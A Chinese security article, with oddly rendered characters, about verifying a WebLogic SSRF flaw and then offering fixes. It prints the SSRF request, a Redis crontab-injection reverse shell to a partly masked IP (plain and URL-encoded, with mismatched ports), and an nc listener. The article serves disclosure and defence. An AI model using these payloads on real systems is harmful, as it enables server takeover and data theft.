朱勤風(fēng) 陳哲 馮曉碩 孫海波

【摘要】? ? 本文就工作中發(fā)現(xiàn)的一起“Weblogic_SSRF漏洞”，詳細(xì)介紹了對(duì)該漏洞的驗(yàn)證過(guò)程，以及如何修復(fù)該漏洞，防止攻擊者利用該漏洞對(duì)服務(wù)器進(jìn)行遠(yuǎn)程執(zhí)行代碼，獲得管理員權(quán)限、竊取用戶數(shù)據(jù)等。

【關(guān)鍵詞】? ? 網(wǎng)絡(luò)安全漏洞? ? Weblogic_SSRF? ? 命令執(zhí)行? ? VPS? ? netcat工具

引言：

互聯(lián)網(wǎng)技術(shù)在帶給人們方便快捷的同時(shí)，也出現(xiàn)了越來(lái)越多的網(wǎng)絡(luò)安全漏洞。2021年5月下旬，受富士通安全事件影響，參與東京奧運(yùn)會(huì)網(wǎng)絡(luò)安全演習(xí)的約90家組織安全管理人員的個(gè)人信息泄露;據(jù)悉，為了應(yīng)對(duì)2021年?yáng)|京奧運(yùn)會(huì)期間可能出現(xiàn)的網(wǎng)絡(luò)攻擊，日本國(guó)家網(wǎng)絡(luò)安全中心召集約170位安全管理人員參與演習(xí)，他們的個(gè)人信息均遭泄露。目前距離東京奧運(yùn)會(huì)正式開幕還有50天左右，組委會(huì)及日本政府正加大努力，以防止這場(chǎng)體育盛會(huì)遭受網(wǎng)絡(luò)攻擊 [1]。

服務(wù)端請(qǐng)求偽造（Server-Side Request Forgery），指的是攻擊者在未能取得服務(wù)器權(quán)限時(shí)，利用服務(wù)器的漏洞，以服務(wù)器身份發(fā)送一條構(gòu)造好的請(qǐng)求給服務(wù)器所在內(nèi)網(wǎng)，對(duì)內(nèi)網(wǎng)的端口和服務(wù)進(jìn)行探測(cè)，進(jìn)而實(shí)施不法活動(dòng)。SSRF通常是攻擊對(duì)外部網(wǎng)絡(luò)無(wú)法直接訪問(wèn)的內(nèi)部系統(tǒng)。

一、事件經(jīng)過(guò)

筆者一直從事對(duì)網(wǎng)站的網(wǎng)絡(luò)安全漏洞掃描工作，于2021年5月發(fā)現(xiàn)一起比較典型的Weblogic_SSRF漏洞，供讀者參考。漏洞詳細(xì)情況：漏洞名稱為Weblogic_SSRF漏洞;漏洞數(shù)量1個(gè);漏洞等級(jí)為高危;網(wǎng)站地址為：http：//www.----.com：7001/uddiexplorer/ （“---”代表網(wǎng)站部分域名地址）。

二、驗(yàn)證過(guò)程

1.首先通過(guò)Web安全漏洞掃描工具，發(fā)現(xiàn)網(wǎng)站（http：//www.----.com：7001/uddiexplorer/）存在Weblogic_SSRF漏洞。下面我們開始對(duì)這個(gè)鏈接地址進(jìn)行漏洞驗(yàn)證，在驗(yàn)證時(shí)需要使用VPS（Virtual Private Server 虛擬專用服務(wù)技術(shù)）進(jìn)行端口反彈，對(duì)服務(wù)器進(jìn)行攻擊使用。

2.開始驗(yàn)證，查看該漏洞所在目標(biāo)頁(yè)面，如圖1所示。

圖1? ? 漏洞位置

3.我們抓取如下代碼所示的請(qǐng)求包，對(duì)該請(qǐng)求進(jìn)行分析。在該請(qǐng)求中operator參數(shù)是指對(duì)其它的url地址進(jìn)行請(qǐng)求，測(cè)試該url地址是否存在SSRF漏洞。目的是對(duì)網(wǎng)絡(luò)中的內(nèi)網(wǎng)進(jìn)行攻擊，因?yàn)镾SRF攻擊對(duì)象通常是對(duì)外部網(wǎng)絡(luò)無(wú)法直接訪問(wèn)的內(nèi)部系統(tǒng)。請(qǐng)示代碼如下：

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1

Host： www.---.com：7001

……………（省略）

operator=http%3A%2F%2Fwww-3.ibm.com%2Fservices%2Fuddi%2Finquiryapi&rdoSearch=name&txtSearchname=111&txtSearchkey=111&txtSearchfor=111&selfor=Business+location&btnSubmit=Search

4.我們修改請(qǐng)求包中operator參數(shù)為http：//127.0.0.1，并添加一個(gè)不存在的端口7000。請(qǐng)求后，在右側(cè)的界面中，返回結(jié)果為不能連接到http：//127.0.0.1，如圖2所示。

圖2? ? 不能連接到指定的地址

圖3? ? 存在端口響應(yīng)截圖

5.我們修改請(qǐng)求包中operator參數(shù)為http：//127.0.0.1，并添加一個(gè)存在的端口7001。請(qǐng)求后，在右側(cè)的界面中，返回參數(shù)為404，說(shuō)明已經(jīng)連接到地址http：//127.0.0.1，但是無(wú)法訪問(wèn)，如圖3所示。

通過(guò)4、5兩個(gè)步驟，我們可以發(fā)現(xiàn)：通過(guò)內(nèi)網(wǎng)返回響應(yīng)的參數(shù)不同來(lái)判斷內(nèi)網(wǎng)端口的開放情況（7000端口返回不能連接，7001端口返回404），進(jìn)而知道內(nèi)網(wǎng)服務(wù)的情況，從而加已利用。

6.Weblogic的SSRF有一個(gè)重要特征，即我們可以通過(guò)字符“%0a%0d”來(lái)注入換行，而某些服務(wù)（如redis）是通過(guò)換行符來(lái)分隔每條命令的，也就是說(shuō)我們可以通過(guò)SSRF攻擊內(nèi)網(wǎng)中的redis服務(wù)器。下面我們進(jìn)行演示，首先通過(guò)SSRF探測(cè)內(nèi)網(wǎng)中的redis服務(wù)器。內(nèi)網(wǎng)中的網(wǎng)段很多是以172開頭的，對(duì)172開頭的網(wǎng)段進(jìn)行腳本探測(cè)，根據(jù)返回的結(jié)果來(lái)判斷內(nèi)網(wǎng)端口或者服務(wù)是否開啟。探測(cè)內(nèi)網(wǎng)地址以及關(guān)鍵端口的腳本網(wǎng)上有許多，我們是從該網(wǎng)址下載了一個(gè)：https：//github.com/ZH3FENG/Weblogic_SSRF/blob/master/Weblogic_SSRF.py

運(yùn)行腳本程序，探測(cè)結(jié)果如圖4所示。

圖4? ? 腳本探測(cè)內(nèi)網(wǎng)端口開放情況

7.從圖4中我們可以看到，腳本運(yùn)行后探測(cè)出IP地址為172.26.0.3：6379，端口為6379，服務(wù)為redis。我們將探測(cè)出的IP地址及端口寫入第3步中的請(qǐng)求包中，運(yùn)行后返回“did not have a valid SOAP content-type”，如圖5所示。

圖5? ? 對(duì)內(nèi)網(wǎng)開放端口進(jìn)行訪問(wèn)測(cè)試

8.通過(guò)6379端口，我們給定時(shí)任務(wù)/etc/crontab中寫入shell，shell如下：

Test

set 1 “＼n＼n＼n＼n0-59 0-23 1-31 1-12 0-6 root bash -c ‘sh -i >& /dev/tcp/175.--.---.240/21 0>&1＼n＼n＼n＼n”

config set dir /etc/

config set dbfilename crontab

save

aaa

9.將第8步中的shell命令進(jìn)行url編碼（注意，換行符是“＼r＼n”，也就是“%0D%0A”，“---”為部分公網(wǎng)地址），編碼后結(jié)果如下：

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F175.--.---.240%2F7777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

將編碼之后的shell寫入請(qǐng)求包的operator參數(shù)中，如圖6所示，在VPS上執(zhí)行”nc -lvnp 7777”對(duì)7777端口進(jìn)行監(jiān)聽。nc是netcat的簡(jiǎn)寫，有著網(wǎng)絡(luò)界的瑞士軍刀美譽(yù)，因?yàn)樗绦【?、功能?shí)用，被設(shè)計(jì)為一個(gè)簡(jiǎn)單、可靠的網(wǎng)絡(luò)工具，可以實(shí)現(xiàn)任意TCP/UDP端口的偵聽，-l用于指定nc將處于偵聽模式，-v顯示指令執(zhí)行過(guò)程，-n直接使用IP地址，而不通過(guò)域名服務(wù)器，-p<通信端口>設(shè)置本地主機(jī)使用的通信端口。

圖6? ? ?編輯腳本對(duì)內(nèi)網(wǎng)進(jìn)行命令執(zhí)行

10.監(jiān)聽目標(biāo)服務(wù)器。執(zhí)行第9步后，我們?cè)赩PS上執(zhí)行“nc -lvnp 7777”命令，已經(jīng)可以接收到目標(biāo)服務(wù)器的shell，如圖7所示。

圖7? ? ?接收到目標(biāo)服務(wù)器的shell

從上面的驗(yàn)證過(guò)程中，我們可以看到網(wǎng)站（http：//www.---.com：7001/uddiexplorer/SearchPublicRegistries.jsp）存在Weblogic_SSRF漏洞。通過(guò)該漏洞我們可以在定時(shí)任務(wù)中寫入shell，進(jìn)行遠(yuǎn)程命令執(zhí)行，使用nc工具監(jiān)聽端口，直接拿到當(dāng)前用戶的權(quán)限。

三、修復(fù)建議

1.過(guò)濾返回的信息。如果Web應(yīng)用是去獲取某一種類型的文件，那么在把返回結(jié)果展示給用戶之前先驗(yàn)證返回的信息是否符合標(biāo)準(zhǔn)。

2.統(tǒng)一錯(cuò)誤信息，避免用戶可以根據(jù)錯(cuò)誤信息來(lái)判斷遠(yuǎn)程服務(wù)器的端口狀態(tài)。

3.限制請(qǐng)求的端口，比如80、443、8080、8090等敏感端口。

4.禁止不常用的協(xié)議，僅僅允許http和https請(qǐng)求?？梢苑乐诡愃朴趂ile：//、gopher：//、ftp：//等引起的問(wèn)題。

5.使用DNS緩存或者Host白名單的方式。

四、結(jié)束語(yǔ)

網(wǎng)絡(luò)安全漏洞防護(hù)工作不是一勞永逸的，尤其是零日漏洞的存在，更是對(duì)網(wǎng)絡(luò)安全造成重大危害。為了確保我們網(wǎng)站的安全，必須提高工作人員的責(zé)任心，定期對(duì)網(wǎng)站進(jìn)行漏洞掃描工作，及時(shí)發(fā)現(xiàn)漏洞并修復(fù)，防止發(fā)生安全事件。這次發(fā)現(xiàn)的Weblogic_SSRF漏洞，可以對(duì)內(nèi)外網(wǎng)的端口和服務(wù)進(jìn)行掃描，攻擊運(yùn)行在內(nèi)網(wǎng)或本地的應(yīng)用程序等，危害巨大。

網(wǎng)絡(luò)安全關(guān)系到國(guó)家的安全及發(fā)展。2021年6月10日，第十三屆全國(guó)人民代表大會(huì)常務(wù)委員會(huì)第二十九次會(huì)議通過(guò)了《中華人民共和國(guó)數(shù)據(jù)安全法》，進(jìn)一步規(guī)范了數(shù)據(jù)處理活動(dòng)，保障數(shù)據(jù)安全，促進(jìn)數(shù)據(jù)開發(fā)利用，保護(hù)個(gè)人、組織的合法權(quán)益，維護(hù)國(guó)家主權(quán)、安全和發(fā)展利益。網(wǎng)絡(luò)安全無(wú)小事，必須做到防患于未然。

參? 考? 文? 獻(xiàn)

[1]互聯(lián)網(wǎng)安全內(nèi)參. 東京奧組委遭網(wǎng)絡(luò)攻擊，工作人員信息外泄.2020-09-27;